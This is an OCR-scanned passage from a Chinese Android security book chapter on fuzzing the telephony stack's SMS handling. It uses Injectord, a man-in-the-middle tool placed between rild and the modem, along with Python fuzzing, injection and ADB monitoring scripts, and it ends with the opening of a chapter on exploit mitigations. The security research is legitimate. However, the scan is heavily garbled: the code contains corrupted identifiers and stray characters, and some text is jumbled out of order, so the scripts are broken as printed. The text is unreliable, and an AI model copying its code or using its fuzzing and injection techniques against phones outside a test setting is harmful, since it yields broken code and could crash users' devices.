发 送 特定 类 型 的 SMS 消息 。 移 动 运营 商会 接收 某 些 消息 类 型 但 并 不 会 转发 ;然而 我 们 无 法 访问 
运营 商 的 系统 ， 因 此 无 法 判断 为 什么 目标 手机 没有 接收 到 某 条 消息 。 再 次 ,发 送 短信 毕竟 需要 钱 
(尽管 有 些 套 餐 包 含 无 限 的 短信 数量 )， 而 且 移动 运营 商 可 能 会 禁 掉 每 天 都 发 出 几 千 条 短信 的 账 
号 。 此 外 , 运营 商 在 理论 上 能 记录 下 所 有 经 过 其 网 络 的 SMS 信息 ， 可 能 捕获 到 触发 漏洞 的 SMS 
信息 ,从 而 拿 到 我 们 的 模糊 测试 结果 。 最 后 ,恶意 构造 的 信息 也 可 能 无 意 中 伤害 到 后 端的 移动 通 
信和 系统， 比如 SMSC 节点 。 综 合 上 面 这 些 情 况 来 看 , 通过 真实 的 移动 网 络 来 发 送 用 于 模糊 测试 的 
SMS 信息 并 不 是 可 靠 的 选择 。 

有 许多 方法 可 以 清除 这 些 障碍 ， 比 如 使 用 一 个 小 型 GSM 基站 来 架设 自己 的 移动 网 络 。 不 过 
也 有 更 好 的 选择 ， 比 如 模拟 蜂窝 调制 解 调 融 。 
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需要 模拟 蜂窝 调制 解 调 器 中 的 特定 部 分 ， 向 Android 电话 栈 中 注入 SMS 消息 。 用 软件 实现 
一 个 完整 的 调制 解 调 需 模拟 需 也 未 尝 不 可 , 不 过 会 增加 许多 不 必要 的 工作 。 其 实 ， 只 需 模拟 调制 
解 调 器 中 少数 几 个 特定 的 功能 即 可 。 我 们 采用 的 方法 是 在 调制 解 调 器 和 rild 之 间 插 入 一 块 代码 ， 
充当 中 间 人 的 角色 , 来 监控 并 修改 两 者 之 间 传 输 的 所 有 数据 。 在 这 个 层级 插入 代码 , 可 以 访问 rild 
和 调制 解 调 器 之 间 交 换 的 所 有 指令 及 其 返回 结果 数据 , 还 可 以 拦截 或 修改 这 些 指 令 与 结果 。 最 重 
要 的 是 ,我 们 能 注入 自 定义 的 返回 结果 ,并 将 其 伪装 成 来 自 调 制 解 调 器 ,RL 守护 程序 以 及 Android 
电话 栈 的 其 他 组 件 并 不 能 准确 区 分 每 条 指令 到 底 是 真实 的 还 是 注入 进来 的 , 因此 会 按照 来 自 真 实 
调制 解 调 需 的 情况 去 接受 和 处 理 所 有 的 指令 和 结果 。 因 此 , 插入 代码 是 一 种 很 强大 的 方法 ,可 以 
用 于 人 研究 蜂窝 调制 解 调 器 与 Android 电话 栈 边界 处 的 安全 性 问题 。 

1. 插入 基于 GSM AT 指令 的 vendor-ril 

在 现实 中 ， 很 容易 就 能 找到 实现 GSM AT 指令 集 的 蜂窝 基带 系统 。 由 于 这 套 AT 指令 集 基于 
文本 , 也 比较 容易 理解 和 实现 。 因 此 , 它 非常 适合 用 于 RIL 安全 性 的 研究 。2009 年 , Collin Mulliner 
和 Charlie Miller 在 USENIX 会 议 的 第 三 届 攻 击 技术 研讨 会 WOOT ) 上 发 表 论文 “Injecting SMS 
Messages into Smart Phones for Vulnerability Analysis”(《 基 于 SMS 消息 注入 技术 的 智能 手机 漏洞 
分 析 》)， 介 绍 了 在 iOS、Windows Phone 和 Android 上 的 相关 工作 。 这 篇 论文 的 原文 参阅 
http://www.usenix.org/events/woot09/tech/full papers/mulliner.pdf。 在 文章 中 ， 两 位 作者 开发 了 名 为 
Injectord 的 工具 ， 用 于 注入 rild 进行 中 间 人 攻击 。Injectord 的 源码 见 http://www.mulliner.org/ 
security/sms/ 以 及 本 书 的 附带 材料 。 

在 测试 设备 HTC One V 中 ,tild 使 用 了 名 为 /dev/smd0 的 串 行 设备 文件 。 在 这 里 ，Injectord 
主要 充当 代理 者 ， 打 开 这 个 串 行 设备 ， 并 向 rild 提供 一 个 新 的 串 行 设备 。Injectord 从 伪装 的 串 行 
设备 中 读 取 rild 发 来 的 指令 ,将 其 转发 给 原本 与 调制 解 调 器 相连 的 串 行 设备 。 一 旦 从 原来 的 设备 
读 取 到 回复 数据 ，Injectord 就 会 将 这 些 数据 写 人 伪装 的 串 行 设备 从 而 转发 给 rild。 

为 了 欺骗 rild 使 用 伪装 的 串 行 设备 ， 先 将 原来 的 /dev/smd0 设备 改名 为 /dev/smd0real， 然 后 
Injectord 会 创建 一 个 名 为 /dev/smd0 的 伪装 设备 ， 这 样 rild 就 会 使 用 新 的 伪装 设备 。 在 Linux 中 ， 
设备 文件 的 文件 名 对 内 核 来 说 其 实 并 不 重要 ,因为 内 核 只 关心 设备 的 类 型 以 及 主编 号 (表示 设备 
类 型 ) 和 次 编号 (表示 设备 分 区 号 )。 具 体操 作 步 又 如 下 : 

mv /dev/smd0 /dev/smd0real 


/data/local/tmp/injectord 
kill -9 <PID of rild> 


Injectord 在 运行 中 会 记录 下 蜂 罕 基带 和 rild 之 间 的 所 有 通信 。 下 面 是 手机 向 基带 发 送 SMS 
时 的 日 志 示 例 : 


read 11 bytes from rild 
AT+CMGS=22 








































































































































































































read 3 bytes from smd0 
2 


read 47 bytes from rild 
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0001000e8100947167209508000009c2f77b0da297e774 
read 2 bytes from smd0 


read 14 pytes from smd0 
+CMGS: 128 
0 


第 一 条 指令 告诉 调制 解 调 器 SMS PDU 的 长 度 , 在 本 例 中 是 22 字 节 。 接 下 来 调制 解 调 器 回复 
一 个 > 符号 表示 已 经 准备 好 接收 SMS 消息 ， 所 以 rild 在 下 一 行 发 出 以 十 六 进 制 编码 的 SMS PDU 
数据 ( 44 字符 )。 最 后 ,调制解调器 回复 收 到 了 该 SMS 消息 。 通 过 分 析 Injectord 的 日 志 ， 可 以 
高 效 地 学 习 AT 指令 集 ， 包 括 某 些 非 标准 vendor-ril 与 调制 解 调 器 的 通信 过 程 。 

2. SMS 送 达 手 机 的 过 程 

我 们 的 主要 目标 是 模拟 SMS 从 移动 网 络 送 达 Android 电话 栈 的 过 程 。 具 体 来 说 ， 重 点 关注 
SMS 消息 是 如 何 从 调制 解 调 器 发 到 rild 的 。GSM AT 指令 集 定义 了 基带 和 电话 栈 之 间 的 两 种 交互 
模式 :指令 - 应 答 式 交 互 和 主动 响应 式 交 互 。 指 令 - 应 答 式 交互 是 电话 栈 发 出 一 个 对 基带 的 指令 ， 
基带 立即 作出 应 答 ; 主动 响应 式 交 互 则 是 当 移 动 网 络 传 来 一 个 事件 时 ,基带 进行 一 次 主动 响应 式 
交互 。 从 基带 把 SMS 消息 传 给 电话 栈 ， 用 的 就 是 第 二 种 模式 ; 拨 入 的 语音 通话 也 用 第 二 种 方式 
通知 。 下 面 是 AT 主动 响应 的 一 个 示例 ， 它 由 Injectord 工具 嗅 探 一 条 SMS 消息 的 接收 过 程 得 到 。 


+CMT: ,53 
0891945111325476F8040D91947187674523F10000012 
0404143944025C8721EA47CCFD1F53028091A87DD273A88FC06D1D16510BDCC1EBF41F437399C07 


第 1 行 是 主动 响应 的 名 称 +CMT 以 及 消息 的 字 节 长 度 。 第 2 行 是 十 六 进 制 编码 的 消息 内 容 。 
最 后 ， 电 话 栈 发 出 一 条 AT 指令 ， 通 知 基 带 已 经 收 到 了 这 条 主动 响应 消息 。 









































































































































11.3.2 在 Android 中 对 SMS 进行 模糊 测试 


了 解 Android 电话 栈 和 zild 的 工作 原理 之 后 , 就 可 以 基于 这 些 知 识 在 Android 上 进行 SMS 模 
糊 测试 了 。 首先 , 需要 用 之 前 学 到 的 SMS 格式 生成 SMS 消息 的 测试 用 例 。 接 下 来 , 使 用 Injectord 
的 消息 注入 功能 将 这 些 测试 用 例 发 给 测试 手机 。 与 此 同时 ， 需 要 监控 手机 中 的 月 演 情 况 。 最 后 ， 
搜集 月 演 记 录 ， 并 对 这 些 朋 演 情 况 进行 分 析 和 了 验证。 本 节 将 介绍 如 何 完成 这 些 步 又 。 

1. 生成 SMS 消息 

前 面 已 经 介绍 过 SMS 消息 的 格式 ， 现 在 可 以 开始 生成 海量 SMS 消息 用 于 对 Android 电话 栈 
的 模糊 测试 。 第 6 章 介绍 了 模糊 测试 的 方法 ,因此 本 章 只 讨论 将 其 用 于 SMS 会 有 哪些 不 同 之 处 。 

开发 模糊 器 时 需要 用 到 其 他 领域 的 各 类 知识 ，SMS 就 是 一 个 很 好 的 例子 。 在 SMS 消息 中 ， 
许多 字段 不 能 包含 无 效 的 值 ， 因 为 现实 中 的 SMS 消息 会 经 过 SMSC 的 检查 ， 然 后 传人 移动 运营 
商 后 台 系 统 。 如 果 包 含 无 效 的 字段 ， 这 条 消息 根本 不 会 被 SMSC 接受 。 

下 面 看 一 个 UDH 的 模糊 器 。 前 面 已 经 介绍 过 UDH， 它 使 用 了 一 种 简单 的 TLV 编码 格式 ， 
很 适合 作为 简单 的 练习 。 下 面 的 Python 脚本 基于 一 个 创建 SMS 消息 的 开源 库 编 写 ， 该 库 可 以 在 
本 书 的 附带 材料 中 找到 ， 也 可 以 在 网 上 下 载 : http://www.mulliner.org/security/sms/。 这 个 脚本 生 
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成 包含 1 到 10 个 UDH 元 素 的 SMS 消息 。 每 个 元 素 的 类 型 和 长 度 都 是 随机 的 ， 而 具体 的 消息 内 
容 则 由 随机 的 数据 来 填充 。 最 后 生成 的 消息 会 被 保存 在 一 个 文件 中 ,随后 发 送 到 测试 目标 。 运行 
这 个 脚本 所 需 的 所 有 import 文件 都 可 以 在 SMS 库 中 找到 。 


#!/usr/bin/python 











import os 

import sys 

import socket 

import time 

import Utils 

import sms 

import SMSFUZzData 

import random 

from datetime import datetime 
import fuzzutils 


def udhrandfuzz (msisdn, smsc, ts, num): 
8S = SBMS. SMSTOMSt() 
s._msisdn = msisdn 
s._msisdn type = 0x91 
s._smsc = smsc 
s._smsc_ type = 0x91 
s._tppiqd = 0x00 
s._tpdcs = random.randrange (0, 1) 
td. SS lx 
8,. tpdos = 0X04 
s._ timestamp = ts 
s._deliver = 0x04 
s.deliver_raw2flags () 
s._deliver ugdhi = 1 
s.deliver_flags2raw() 
SG = 
s._msg_leng = 0 
SU SS: Tm 
for i in range(0,num): 
tu = chr(random.randrange (0, Oxff)) 
tul = random.randrange(1,132) 
if s. udh leng + tul > 138: 
break 
tud = SMSFUuzZzData.getSMSFuzzData() 
s._udh = s. udh + tu + chr(tul) + tud[:tul] 
s._udh leng = len(s._udh) 
if s. udh leng > 138: 
break 


s._msg_leng = 139 - s._udh leng 
if s._msg_leng > 0: 
s._msg_leng = random.randrange(int(s. msg_leng / 2), s._msg_leng) 
if s._ msg _ leng > 0: 
tud = SMSFUuzzData.getSMSFuzzData() 
Ss._msg = tud[:s._msg_leng] 
else: 
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s._msg_leng = 0 


s.encode () 
return s._pdu 


iy name, 大和 
GE sr [| 

for i in range(0, 

六 

的 KG = 

msg = 





int (sys.argv[1])): 


random.randrange (1,10) 
udhrandfuzz ("4917787654321", 
line = Utils.bin2hex(msg, 1) 
leng = (len(line) / 2) - 8 
out.append( (line, leng)) 
fuzzutils.cases2file(out, sys.argv[2]) 


下 面 是 用 这 个 随机 UDH 生成 器 制造 
Injectord 的 手机 发 送 这 些 消息 。 


UtiLlS, Nex2Dim( "99309251619580".; 


出 来 的 一 些 消息 示例 。 下 一 节 将 介 


0) 


"49177123456", ts, rnd) 


绍 如 何 向 任意 运行 


07919471173254F6440D91947187674523F1784699309251619580837AF 
3142227222722272227222722272227222722272227E2623B3B3B3B3B3B 
3B3B3B3B3B3B3B3B3B3B3B3B3B3B3B3B3B3B3B3B3B3B3B3B3B3B3B3B3B3B 
3B3B3B3B3B3B3B3B3B3B3B3B3B3B3B3B3B3B3B3B3B3B3B3B3B3B3B3B3B3B 
3B3B3B3B3B3B3B3B3B3B3B3B3B3B3B3B3B3B3B3B3B3B3B3B3B3B3B3B3B3B 


3B3B8EBBA78E928494C6 151 


07919471173254F6440D91947187674523F138EA993092516195808A744E72606060606060606060 
60606060606060606060606060606060606060606060606060606060606060606060606060606060 
60606060606060606060606060606060606060606060606060606060606060606060606060606060 
60606060606060606060606060606060606060606060606060181818181818181818181818181818 


181818181818 158 


079194711 


73254F6440D91947187674523F1DE76993092516195806D392B375E5E5E5E5E5ES5ESES5E 


DESEDSESESESESESESESESESESESESESESESESESESESESESESESESESESESESESESESESESESESESESE 
SESESESESESETFIF1IF1IF1IF1FI1F1IF1IF1IFI1F1F1IFI1IFI1F1F1IF1IF1IFIF1IF1IF1IFI1F1F1IF1IF1FI1F1F1IF1F1F1F 


1F1IF1IFI1F1IF1F1F1F1IF1F1IF1IF1FI1F1F1F1F 129 





079194711 


73254F6440D91947187674523F10BA3993092516195807F337B293B3B3B3B3B3B3B3B3B 


3B3B3B3B3B3B3B3B3B3B3B3B3B3B3B3B3B3B3B3B3B3B3B3B3B3B3B3B3B3B3B3BD0060F0OFOFOFOFOF 
BCSCIGCSICICICICICICICSICICICICICICICICICICICICICICICICICICICICICICICICICICICHIECSHCSHC 
COCDCHCDECSDCHCHDCHCICHECHCDECICDECOCHCHCHEICHCHDECHDECICDCHCDCHCHEDCICHDCDECICD GE: E47 


2. 用 Injectord 注入 SMS 消息 

消息 注 
条 消息 应 该 由 两 行文 本 构成 : 第 1 和 

这 条 消息 会 被 注入 rild 所 使 用 的 虚假 串 行 





消息 
消息 
行 应 答 
下 面 这 个 简单 的 Python 程序 将 一 条 








入 的 工作 原理 。Injectord 监听 TCP 4242 号 端口 





等 待 收 到 


条 完整 的 +CMT 














是 +cMT 及 其 长 度 ， 第 2 行 是 十 六 进 制 编码 的 SMS 
设备 中 去 。 收 到 消息 后 
来 确认 。 为 了 防止 调制 解 调 需 产生 问题 ，Injectord 会 拦 下 这 些 确认 指令 。 
SMS 消息 发 送 给 运 和 
其 中 的 sendmsg 函数 的 参数 包括 目标 IP 地址 、 信 息 内 容 、 
CR 类 型 。 由 于 AT 指令 集 使 用 的 是 基于 文本 行 的 协议 ， 每 一 行 都 需 


，fTild 会 对 调制 解 调 需 进 





J 在 HTC One V 手机 上 的 Injectord。 
。 (用 于 +CMT ) 以 及 回 车 换行 
一 个 明确 的 标志 来 指 
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示 它 的 结尾 ， 从 而 表明 这 条 指令 已 经 收发 完成 ， 可 以 进一步 解析 。 可 以 使 用 回 车 〈CR ) 或 者 换 
行 (LF ) 作为 其 终结 符 ， 但 是 在 AT 通信 中 使 用 哪个 组 合 取决 于 具体 的 调制 解 调 器 。 


# use crlftype = 3 for HTC One V 
def sendmsg (dest_ip, msg, msg_cmt, crlftype = 1): 


error = 0 



































if CTFtYDE. Se".1 

buffer = "+CMT: ,%d\r\n%$s\r\n" %$ (msg_cmt, msg) 
ETE ,作息 ”三 三: 2 过 

buffer = "\n+CMT: ,gaqNXngssNn" % (msg_cmt, msg) 
elif crlftype == 3: 

buffer = "\n+CMT: ,%d\r\n%$s\r\n" % (msg_cmt, msg) 
SO = socket.socket (socket .AF_INET，Socket .SOCK_STREAM ) 
trys 

so.connect ((dest_ip, 4223)) 
except: 

EEO EE 1 
ee 

so.send (buffer) 
except: 

全 六 从 信守 ;这 
so.close() 


return error 


3. 监控 测试 目标 








如 果 不 监控 测试 目标 的 状态 , 只 进行 模糊 测试 是 毫 无 意义 的 , 因为 无 法 通过 观察 手机 屏幕 来 
判断 是 否 发 生 了 骨 溃 。 此 外 ,还 需要 将 整个 测试 过 程 自动 化 ,只 研究 可 以 导致 某 种 崩溃 的 测试 用 











中 电话 栈 和 SMS 栈 的 骨 汪 








例 的 logcat 输出 和 相应 的 SMS 消息 保存 下 来 。 每 跑 完 一 个 测试 用 例 就 清理 一 次 系统 日 志 ， 然 














例 。 因 此 ， 必 须 在 进行 模糊 测试 的 同时 监控 手机 的 状态 ， 还 要 不 时 重启 SMS 软件 来 降低 测试 的 
副作用 ， 比 如 由 于 反复 处 理 之 前 的 测试 用 例 而 导致 月 溃 。 可 以 用 ADB 工具 来 监控 Android 手机 











情况 ， 基 本 方法 如 下 : 先 使 用 前 面 的 Python 函数 sendmsg 发 送 一 条 





SMS 消息 到 手机 中 运行 的 Injectord 上 ; 这 条 SMS 消息 被 注入 后 ,通过 ADB 的 logcat 指令 来 
获取 Android 系统 日 志 。 如 果 该 日 志 中 包含 native 层 骨 省 或 Java 层 异 常 的 信息 ， 就 将 当前 测试 用 




















后 跑 下 一 个 。 每 处 理 完 50 条 SMS 消息 ， 就 清空 手机 中 的 SMS 数据 库 ， 然 后 重启 SMS 程序 。 下 
面 的 Python 代码 实现 了 这 些 操作 : 


#!/usr/bin/python 


import os 
import time 
import socket 


def get_log(path = "" 





二 


cmd = path + "adb logcat -d" 
1 = os.popen (cmad) 


的 
.Close() 
return 工 
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def clean_ log(path = ""): 
cmd = path + "adb logcat -c" 
C = os.popen (cmd) 
bla = c.read() 
c.close!() 
return 1 


def check_log(1og) : 

e = 0 

if log.find("Exception") 1= =1: 
e=1 

if log.find("EXCEPTION") != -1: 
e=1 

if log.find("exception") != -1: 
(= 

return e 


def kill_ proc(path = "", name = ""): 
cmd = path + "adb shell \"su -c busybox killall -9 " + name + "\"" 
1 = os.popen (cmd) 
:s.read(y) 
.close() 
return 工 


def clean_sms_db(path = ""): 
cmd = path + "adb shell \"su -C rm " 
cmd = cmd + "/data/data/com.android.providers.telephony" 
cmd = cmd + "/databases/mmssms .db\"" 
1 = os.popen (cmd) 
-Lead() 
1l.closel() 
return r 


def cleanup_device(path = ""): 
clean_sms_db (path) 

kill _ proc(path, "com.android.mms") 

kill proc(path, "com.android.phone") 


def log_bug(filename, log, test_case): 
fp = open(filename, "w") 
fp.write(test_case) 

fp.write 





def file2cases (filename): 
eut = [| 
fp = open (filename) 
line = fp.readline() 
while line: 
GE ine Split( ") 
out.append((cr[0], int(cr[1] .rstrip("\n")))) 
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line = fp.readline!() 
fp.close() 
return out 


def sendcases (dest_ip, cases, logpath, cmdpath = "", crlftype = 1, delay = 5， 
status =: 0 Start e000) 
count = 0 
cleaner = 0 
for i in cases: 
if count >= start: 
(line, cmt) = i 
error = sengdmsg (dest_ip, line, cmt, crlftype) 
i tatts S03 
print "%d) error=%d data: %s" % (count, error, line) 
time.sleep (delay) 
1 = get_log(cmdpath) 
#print 1 
i Cle 169(L) a1 
Jout = line + " " + str(cmt) + "\n\n" 
log_bug(logpath + str(time.time()) + ".log", 1, lout) 
clean_log (cmdpath) 
count = count + 1 
cleaner = cleaner + 1 
if cleaner >= 50: 
cleanup_device (cmdpath) 
cleaner = 0 


def sendcasesfromfile(filename, dest_ip, cmdpath = "", crlftype = 1, delay = 5， 
lo0uDatl se L0G0RY 7 Statia SS CV BtarE E,W 
cases = file2cases (filename) 
sendcases (dest_ip, cases, logpath, cmdpath, crlftype = crlftype, 
delay = delay, Status = etatwis;, start = Start) 

if name sa Wm 
fn = os.sys.argv[1] 
dest = os.sys.argv[2] 
startr ee 0 
if len(os.sys.argv) > 3: 

start = int(os.sys.argv[3]) 
print "Sending test cases from %s to %s" $$ (fn, dest) 
sendcasesfromfile(fn, dest, cmdpath = "", crlftype = 3, status = 1, 

start = start) 


下 面 是 这 个 模糊 测 I 试 监控 脚本 记录 的 一 个 月 演 日 志 示 例 。 其 中 显示 SmsReceiverServic 
出 现 了 一 个 NullPointerException 异常 。 如 果 运 气 不 错 ,还 可 能 发 现 导 致 rild 内 部 出 现 native 


层 骨 演 的 bug。 


V/SmsReceiverService(11360): onStart: #1 mResultCode: -1 = Activity.RESULT_ OK 

V/UsageStatsService(11473): CMD_ID _ UPDATE MESSAGE_ USAGE 

V/SmsReceiverService( 6116): onStart: #1, @1090741600 

E/NotificationService( 4286): Ignoring notification with icon==0: Notification 
(contentView=null vibrate=null,sound=nullnull,defaults=0x0,flags=0x62) 

D/SmsReceiverService( 6116): isCbm: false 
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D/SmsReceiverService( 6116): isDiscard: false 
D/SmsReceiverService( 6116): [HTC_ MESSAGES] - SmsReceiverService: 
handleSmsReceived() 
W/dalvikvm(11360): threadid=12: thread exiting with uncaught exception 
(group=0x40a9e228) 
D/SmsReceiverService( 6116): isEvdo: false before inserMessage 
D/SmsReceiverService( 6116): sms notification lock 
E/AndroidRuntime(11360): FATAL EXCEPTION: SmsReceiverService 
E/AndroidRuntime(11360): java.lang.NullPointerException 
E/AndroidRuntime(11360): at com.concentriclivers.mms.com.android.mms. 
transaction.SmsReceiverService.replaceFormFeeds 
(SmsReceiverService.java:512) 
/AndroidRuntime(11360): at com.concentriclivers.mms.com.android.mms. 
transaction.SmsReceiverService.storeMessage 
(SmsReceiverService.java:527) 
/AndroidRuntime(11360): at com.concentriclivers.mms.com.android.mms. 
transaction.SmsReceiverService.insertMessage 
(SmsReceiverService.java:443) 
/AndroidRuntime(11360): at com.concentriclivers.mms.com.android.mms. 
transaction.SmsReceiverService.handleSsmsReceived 
(SmsReceiverService.java:362) 


[ea 


[ea 





[ea 








E/AndroidRuntime(11360): at com.concentriclivers.mms.com.android.mms. 
transaction.SmsReceiverService.accesss$l1 (SmsReceiverService.java:359) 
E/AndroidRuntime(11360): at com.concentriclivers.mms.com.android.mms. 








transaction.SmsReceiverServices$sServiceHandler.handleMessage 
(SmsReceiverService.java:208) 
E/AndroidRuntime(11360): at android.os.Handler.dispatchMessage (Handler. 
java:99) 
E/AndroidRuntime(11360): a 
E/AndroidRuntime(11360): a 
java:60) 
D/SmsReceiverService( 6116): smsc time: 03/29/99, 8:16:59am, 922713419000 
D/SmsReceiverService( 6116): device time: 01/21/13, 6:20:01lpm, 1358810401171 
E/EmbeddedLogger( 4286): App crashed! Process: com.concentriclivers.mms.com. 
android.mms 

E/EmbeddedLogger( 4286): App crashed! Package: com.concentriclivers.mms.com. 
android.mms v3 (4.0.3) 

E/EmbeddedLogger( 4286): Application Label: Messaging 


4. 验证 模糊 测试 结果 
面 介绍 a es 导致 崩 演 的 SMS 消息 ， 需 要 使 用 真 
实 的 移动 网 络 进行 验证 ， 因 为 之 前 生成 的 SMS 消息 可 能 不 被 真实 的 SMSC 所 接受 。 要 测试 某 条 
消息 是 否 被 SMSC 所 接受 , 最 简单 的 方法 就 是 将 这 个 测试 用 例 发 给 另 一 个 手机 。 但 是 请 注意 , 生 
成 的 SMS 消息 是 SMS-Deliver 格式 的 ， 发送 之 前 需要 转换 成 SMS-Submit 格式 。 有 两 种 方法 可 以 
实现 这 一 测试 。 一 种 是 使 用 在 线 服务 发 送 这 条 SMS 信息 ， 比 如 www.routomessaging.com 和 
www.clickatel.com。 绝 大 部 分 的 SMS 在 线 服务 都 提供 基于 HTTP 的 简单 API, 使 用 方便 。 男 一 种 
则 直接 用 手机 将 其 发 送 给 另 一 个 手机 。 
在 Android 手机 上 ， 这 还 是 有 些 麻烦 的 ， 因 为 Android 的 SMS 相关 API 不 支持 发 送 原始 的 
PDU 信息 。 不 过 有 两 种 方法 可 以 实现 。 第 一 种 是 直接 使 用 GSM AT 指令 AT+CMGS 来 发 送 SMS 


android.os.Looper.loop (Looper.java:154) 
android.os.HandlerThread.run (HandlerThread. 











tH 术 于 
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信息 ， 不 过 只 有 当 调制 解 调 器 与 RIL 之 间 的 通信 走 AT 指令 集 时 ， 这 个 方法 才 有 效 。 此 时 ， 可 以 
修改 Injectord 的 代码 ， 使 其 向 调制 解 调 器 发 送 cvcs 指令 。 第 二 种 则 只 能 用 于 HTC 的 Android 
手机 。HTC 实现 了 一 个 新 的 功能 ， 因 而 可 以 通过 Java API 发 送 原始 的 PDU SMS 信息 。 这 个 API 






























































是 隐藏 的 ， 需 要 通过 Java 反射 来 调用 。 下 面 的 代码 就 是 在 HTC 的 Android 手机 上 实现 发 送 原始 


的 PDU 信息 : 


void htc_sendsmspdu (byte pdul]) 


{ 


11.4 


try { 


SmsManager sm = SmsManager.getDefault(); 

byte[] bb = new bytel[1]; 

Method m = SmsManager.class.getDeclaredMethod ("sendRawPdu",bb.getClass(), 
bb.getClass(), PendingIntent.class, PendingIntent.class, boolean.class, 
boolean.class); 

m.setAccessible(true); 

m.invoke(sm, null, pdu, null, null, false, false); 
} catch (Exception e) { 

e.printStackTrace(); 


} 


小 结 


本 章 介 绍 了 许多 关于 Android 电话 栈 的 知识 ， 尤 其 是 RIL。 我 们 简单 了 解 了 RIL 的 功能 以 及 
硬件 制造 商 将 蜂窝 通信 硬件 与 Android 框架 相 集 成 的 必要 工作 ,并 进一步 探索 了 如 何 监控 Android 





RIL 与 蜂 窜 调制 解 调 带 硬件 之 间 的 通信 。 























本 章 后 半 部 分 讲述 了 如 何 对 Android 设备 的 SMS 消息 子 系统 进行 模糊 测试 ， 其 中 包含 关于 
SMS 消息 格式 的 知识 ， 以 及 如 何 构建 SMS 消息 的 模糊 生成 器 。 本 章 还 介绍 了 如 何 使 用 ADB 来 
监控 Android 电话 栈 的 骨 溃 情况 。 有 了 这 些 知识 ， 就 可 以 开始 对 Android 的 RIL 子 系统 进行 自己 
的 攻击 实验 了 。 

下 一 章 将 从 历史 和 内 部 工作 原理 的 角度 对 Android 平 台 已 经 采用 的 各 类 漏洞 利用 缓解 技术 进 
行 详细 介绍 。 











漏洞 利用 缓解 技术 








在 漏洞 研究 社区 中 , 攻防 双方 的 研究 者 之 间 随 时 都 在 进行 军备 竞赛 。 每 当成 功 的 攻击 方法 被 
发 现 或 公开 ， 防 守 方 就 会 努力 工作 ,防止 接 下 来 出 现 类 似 的 攻击 。 他 们 为 此 设计 和 实现 了 许多 漏 
洞 利用 缓解 技术 。 每 当 新 的 缓解 技术 发 布 ， 攻 击 方 的 社区 就 开始 忙碌 起 来 。 他 们 必须 找 出 新 的 漏 
洞 利用 技术 , 让 自己 的 攻击 在 新 的 保护 机 制 下 依然 有 效 。 而 一 旦 开发 出 的 新 技术 被 公开 ,其 效果 
又 会 逐渐 减弱 。 防 守 方 研究 者 会 又 一 次 忙碌 起 来 ,设计 出 新 的 保护 机 制 ， 如 此 不 断 反复 。 

本 章 将 介绍 现代 漏洞 利用 缓解 技术 及 其 与 Android 系统 的 关系 。 首 先 从 设计 和 实现 的 角度 ， 
大 致 介绍 一 些 主要 的 缓解 技术 。 然 后 从 历史 发 展 的 角度 ， 回 顾 Android 系统 对 这 些 缓解 技术 的 文 
持 情 况 ; 一 些 例子 还 会 给 出 源 代码 引用 。 接 下 来 讨论 如 何 禁 用 和 对 抗 这 些 缓解 技术 。 最 后 面向 未 
来 ， 讨 论 哪些 缓解 技术 可 能 会 被 加 入 Android 系统 。 


12.1 缓解 技术 的 分 类 


现代 操作 系统 使 用 各 种 漏洞 利用 缓解 技术 来 增强 对 抗 攻 击 的 能 力 ,一 些 会 直接 阻止 内 存 朋 演 
型 漏洞 利用 , 还 有 一 些 用 于 阻止 其 他 类 型 的 攻击 ， 如 符号 链接 攻击 。 采 用 缓解 技术 可 以 让 攻击 变 
得 更 为 困难 ， 从 而 提高 攻击 成 本 。 

采用 某 项 缓解 技术 之 前 , 往往 需要 修改 系统 的 各 类 组 件 。 有 些 基于 硬件 的 缓解 技术 具有 非常 
好 的 保护 效果 , 但 是 一 般 要 求 对 处 理 器 的 硬件 设计 进行 改动 。 此 外 , 许多 缓解 技术 ( 包括 基于 硬 
件 的 ) 需要 额外 改动 Linux 内 核 ， 以 获得 内 核 级 文 持 。 还 有 一 些 缓解 技术 需要 修改 运行 时 库 或 者 
编译 工具 链 。 
采用 这 些 技 术 时 ， 其 必要 的 系统 修改 会 带 来 损失 或 开销 。 对 基于 硬件 的 缓解 技术 ,修改 指令 
集 架 构 (Instruction Set Architecture ，ISA ) 或 底层 处 理 器 的 设计 会 产生 极 大 的 开销 ， 部 署 新 的 处 
理 需 也 需要 一 定 的 时 间 周 期 。 与 修改 处 理 器 设计 相 比 ， 改 动 Linux 内 核 或 者 运行 时 库 较 为 容易 ， 
但 也 需要 编译 内 核 并 部 署 升 级 。 第 1 章 介 绍 过 ,在 Android 生态 环境 下 有 效 地 更 新 操作 系统 的 组 
件 是 一 个 巨大 的 挑战 。 那 些 需 要 改动 编译 工具 链 的 技术 可 能 更 麻烦 , 通常 还 需要 重新 编译 每 个 要 
保护 的 程序 和 共享 库 , 在 其 中 加 入 一 些 特殊 的 标志 。 相 比 之 下 ， 只 需 改 动 操作 系统 就 能 实现 的 技 
术 更 受 欢 迎 , 因为 它们 会 直接 在 整个 系统 范围 内 生效 ; 而 改动 编译 工具 链 则 意味 着 只 有 用 它们 编 
译 的 程序 才 受 到 保护 。 
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此 外 , 性 能 也 是 一 个 要 考虑 的 重要 因素 。 许 多 安全 专家 称 ， 为 了 保护 最 终 用 户 , 产生 一 些 性 
能 开销 是 值得 的 , 但 也 有 不 少 人 反对 这 一 观点 。 许 多 已 知 的 缓解 技术 在 最 初 并 未 被 采用 ,甚至 以 
后 也 不 会 被 采用 ， 主 要 原因 就 是 它们 引入 的 性 能 开销 实在 无 法 令 人 满意 。 

先 忘掉 这 些 麻 烦 ， 来 看 一 些 具体 的 缓解 技术 以 及 如 何 将 其 用 于 Android 系统 。 


12.2 ”代码 签名 


代码 签名 是 一 种 通过 验证 密码 学 签名 来 防止 未 授权 代码 运行 的 机 制 。 通过 公 钥 密码 算法 , 设 
备 可 以 使 用 一 个 公 钥 来 验证 代码 是 否 被 某 个 特定 的 私 钥 ( 由 可 信 权 威 机 构 持 有 ) 所 签名 。 尽 管 
Android 并 未 像 i0OS 和 OS X 那样 严格 地 实施 代码 签名 ,但 是 它 广泛 地 采用 了 签名 检查 ， 如 
TrustZone 、bootloader 锁 、OTA 更 新 和 应 用 程序 等 方面 。 由 于 Android 的 碎片 化 特点 ， 在 不 同 的 
设备 上 验证 代码 的 策略 可 能 会 有 很 大 的 差异 。 

在 Android 中 ， 代 码 签名 使 用 最 普遍 的 是 bootloader 锁 。 在 bootloader 引导 设备 的 各 个 阶段 ， 
较 早 一 级 代码 会 验证 要 加 载 的 下 一 级 代码 是 否 来 自 可 信任 的 源 。 这 个 验证 过 程 会 构成 一 条 信任 
